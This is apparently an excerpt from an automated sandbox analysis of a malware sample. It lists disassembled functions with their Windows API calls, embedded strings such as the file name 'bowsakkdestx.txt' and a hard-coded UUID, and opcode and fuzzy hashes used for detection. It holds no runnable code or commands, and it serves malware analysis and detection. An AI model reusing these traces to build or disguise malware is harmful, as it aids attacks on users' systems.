                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap_free_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1020059152-0
                                                                                                                            • Opcode ID: aa7ba2753989eac8a99e813a82520e4a1b1d28ee97a879ceeff1ea1536972a8c
                                                                                                                            • Instruction ID: fae7b0904c1cca2fb82f650d6bc482dc71516e53d9326d8cef4e01f4f0427edd
                                                                                                                            • Opcode Fuzzy Hash: aa7ba2753989eac8a99e813a82520e4a1b1d28ee97a879ceeff1ea1536972a8c
                                                                                                                            • Instruction Fuzzy Hash: 2611C432408615ABCF203BF5B985A5E3EC8DF51364B100BBBF85896251DF3C88409BD8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047F070 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0047F085
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047F0AC
                                                                                                                            • DispatchMessageW.USER32(?), ref: 0047F0B6
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047F0C4
                                                                                                                            • WaitForSingleObject.KERNEL32(0000000A), ref: 0047F0D2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1380987712-0
                                                                                                                            • Opcode ID: 89dba03d18b4bdcc32a07d0745b9af22508b7246dcbde30d5257c87026a802d6
                                                                                                                            • Instruction ID: a32a788c75e48d68059082e63f6abf7ec19649cae72bad030ca90558325a2686
                                                                                                                            • Opcode Fuzzy Hash: 89dba03d18b4bdcc32a07d0745b9af22508b7246dcbde30d5257c87026a802d6
                                                                                                                            • Instruction Fuzzy Hash: 1901DB35640308B6E730DB55EC46F9A3B6CEB64B10F108421FA04AB2D3D7B5A54DFBA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047E500 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0047E515
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047E53C
                                                                                                                            • DispatchMessageW.USER32(?), ref: 0047E546
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047E554
                                                                                                                            • WaitForSingleObject.KERNEL32(0000000A), ref: 0047E562
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1380987712-0
                                                                                                                            • Opcode ID: aa70838de973720e6f2559b6d3013faaa1ee0830c32d3f9b16a14085bd2562cf
                                                                                                                            • Instruction ID: f073d1624d2ce1809fa69f46634a6e6988ebb60ea847fdf7871033eb0211a217
                                                                                                                            • Opcode Fuzzy Hash: aa70838de973720e6f2559b6d3013faaa1ee0830c32d3f9b16a14085bd2562cf
                                                                                                                            • Instruction Fuzzy Hash: 8B017B3474030976E730DB51EC46F9A7B6DEB58B14F104441FA04AB1D2D6F4A54EE7D4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047FA40 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0047FA53
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047FA71
                                                                                                                            • DispatchMessageW.USER32(?), ref: 0047FA7B
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047FA89
                                                                                                                            • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0047FA94
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1380987712-0
                                                                                                                            • Opcode ID: 701b36f0d1213a79df62d3c62478b3f197dfdf9605a95893632c59937c2449ee
                                                                                                                            • Instruction ID: 397fdd5335d02129c38b8e0f6292f733a436b156887340f9a041782fd1965de3
                                                                                                                            • Opcode Fuzzy Hash: 701b36f0d1213a79df62d3c62478b3f197dfdf9605a95893632c59937c2449ee
                                                                                                                            • Instruction Fuzzy Hash: D5018631B40309B7EB309B54DC4AFAB3F6CAB59B40F548461FA04AE1D2D7F5A80986A4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047FDF0 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0047FE03
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047FE21
                                                                                                                            • DispatchMessageW.USER32(?), ref: 0047FE2B
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047FE39
                                                                                                                            • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0047FE44
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1380987712-0
                                                                                                                            • Opcode ID: 701b36f0d1213a79df62d3c62478b3f197dfdf9605a95893632c59937c2449ee
                                                                                                                            • Instruction ID: aead49e14035084006ce4a1c5c845b54f10400c50ee4d561ec8828ced85e7812
                                                                                                                            • Opcode Fuzzy Hash: 701b36f0d1213a79df62d3c62478b3f197dfdf9605a95893632c59937c2449ee
                                                                                                                            • Instruction Fuzzy Hash: F401D631B40308B7EB309B94DC4AF9B3F6CEF59B40F008421FA04AE1D2D7F5A80986A4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00477BA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 4104443479-4289949731
                                                                                                                            • Opcode ID: 1a8d649d530fca50cbb3cb79b7c7ef50fd7f8351c7125a62f4ab778f00147136
                                                                                                                            • Instruction ID: 3d27813f96c18325d77b53de33a320100ccf3a830b7a448b5caa3450280333c1
                                                                                                                            • Opcode Fuzzy Hash: 1a8d649d530fca50cbb3cb79b7c7ef50fd7f8351c7125a62f4ab778f00147136
                                                                                                                            • Instruction Fuzzy Hash: 3E51E5317042049FDB25CE1CDD809AA77A6EF89304B64C91FF859CB341DB75EC518B99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00474160 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 4104443479-4289949731
                                                                                                                            • Opcode ID: e8304f4da5602aa5644184e33be6fc9e4ea7b7267a6d7b6d3b9d2f0de0dc5c3a
                                                                                                                            • Instruction ID: 5f99cd289d604d68bf5f3492483e84ef7573edcb51cd1377e6ec1013d2ac2499
                                                                                                                            • Opcode Fuzzy Hash: e8304f4da5602aa5644184e33be6fc9e4ea7b7267a6d7b6d3b9d2f0de0dc5c3a
                                                                                                                            • Instruction Fuzzy Hash: D5312A31300104ABDB24EE4CCC859BB77A6EBC17507608A5EF869CB782D735ED518BAD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004BAD50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID: .\crypto\buffer\buffer.c$C7L
                                                                                                                            • API String ID: 2102423945-2563974722
                                                                                                                            • Opcode ID: b63b64def75f4b19ebcf6d1bb6115a4758b79b3b8c2d108ea492648dfd34b2a0
                                                                                                                            • Instruction ID: 6f557642a2fad1dbe27ebd17fd7dd6eb5eb0e9abeae4b16b15aa5be2b0ccf5ac
                                                                                                                            • Opcode Fuzzy Hash: b63b64def75f4b19ebcf6d1bb6115a4758b79b3b8c2d108ea492648dfd34b2a0
                                                                                                                            • Instruction Fuzzy Hash: E421F8B5B442117BE2146669FC43B96B389EB94B18F10402BF718D76C1D2B4AC11C7E9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046C5C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0046C687
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: StringUuid$CreateFree
                                                                                                                            • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                                            • API String ID: 3044360575-2335240114
                                                                                                                            • Opcode ID: a00da4e97a7508685c5fa92ee78aa18495d2084e6ce9bfabf66e8d674303dd77
                                                                                                                            • Instruction ID: bd0ce05f9f734096b249bb812e2112a8d1c054526c771fd0548c405df3255733
                                                                                                                            • Opcode Fuzzy Hash: a00da4e97a7508685c5fa92ee78aa18495d2084e6ce9bfabf66e8d674303dd77
                                                                                                                            • Instruction Fuzzy Hash: D521DA71104341ABDB20DF24D8447AFBBE8AF91758F004E5FF4C987251E7B99509879B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046C470 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0046C48B
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0046C4A9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$AppendFolder
                                                                                                                            • String ID: bowsakkdestx.txt
                                                                                                                            • API String ID: 29327785-2616962270
                                                                                                                            • Opcode ID: bff5d982d0c2ba31b95ad6238f981bb060d7d121778bab6857154635bf944329
                                                                                                                            • Instruction ID: 891837c4c45fb25d3009a6b719b51d231dbfb811e202d2855a75126dde14ff06
                                                                                                                            • Opcode Fuzzy Hash: bff5d982d0c2ba31b95ad6238f981bb060d7d121778bab6857154635bf944329
                                                                                                                            • Instruction Fuzzy Hash: 9A01DB72A8022833D930B959AC47FFF775C9F62721F0004A7FE08D7141E5A5595A57D1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047BA10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0047BA4A
                                                                                                                            • RegisterClassExW.USER32(00000030), ref: 0047BA73
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ClassCursorLoadRegister
                                                                                                                            • String ID: 0$>V
                                                                                                                            • API String ID: 1693014935-1223471409
                                                                                                                            • Opcode ID: bb74f3c54658704bbace866974676c42b35c942acb980a2e058ea213cb8b0ed0
                                                                                                                            • Instruction ID: f7618bcf917664d3832e6fc0dbcdd84621b0f39d4714757821935f35a0716d90
                                                                                                                            • Opcode Fuzzy Hash: bb74f3c54658704bbace866974676c42b35c942acb980a2e058ea213cb8b0ed0
                                                                                                                            • Instruction Fuzzy Hash: 6DF0AFB0C042089BEB00DF90D9197DEBFB8BB08308F108559D4147A280D7BA1608CFE9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046C420 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0046C438
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0046C44E
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0046C45B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$AppendDeleteFileFolder
                                                                                                                            • String ID: bowsakkdestx.txt
                                                                                                                            • API String ID: 610490371-2616962270
                                                                                                                            • Opcode ID: 3151ce7c12c91161ad4312a1baf90d79a04bea5d9d538d33bd6deea06e118da4
                                                                                                                            • Instruction ID: f5f7cf742fda9b06be482443fc52f988e44efe5d681e16bdd18528c6a0b9ad00
                                                                                                                            • Opcode Fuzzy Hash: 3151ce7c12c91161ad4312a1baf90d79a04bea5d9d538d33bd6deea06e118da4
                                                                                                                            • Instruction Fuzzy Hash: D9E08675A4031C67EB30EBA0DC8AFE97B7CAF25B01F000492BB44D20C1E6B0E58D9B91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00479E70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID: p2W
                                                                                                                            • API String ID: 2102423945-3016696164
                                                                                                                            • Opcode ID: 5c52a12be00c7d1fb8d5c872556807fba956def5a037192d4b27ffbb129be8c9
                                                                                                                            • Instruction ID: 816fc5adc046c836e003117ccb53362a93c6c62e7184d3277b519f31c51fdba7
                                                                                                                            • Opcode Fuzzy Hash: 5c52a12be00c7d1fb8d5c872556807fba956def5a037192d4b27ffbb129be8c9
                                                                                                                            • Instruction Fuzzy Hash: 4DF0393828874069F3106790BC0BB297E81A334F18F044048E60C2A2F3D7ED228CB3DE
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004AF23E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON
                                                                                                                            Download Yara Rule
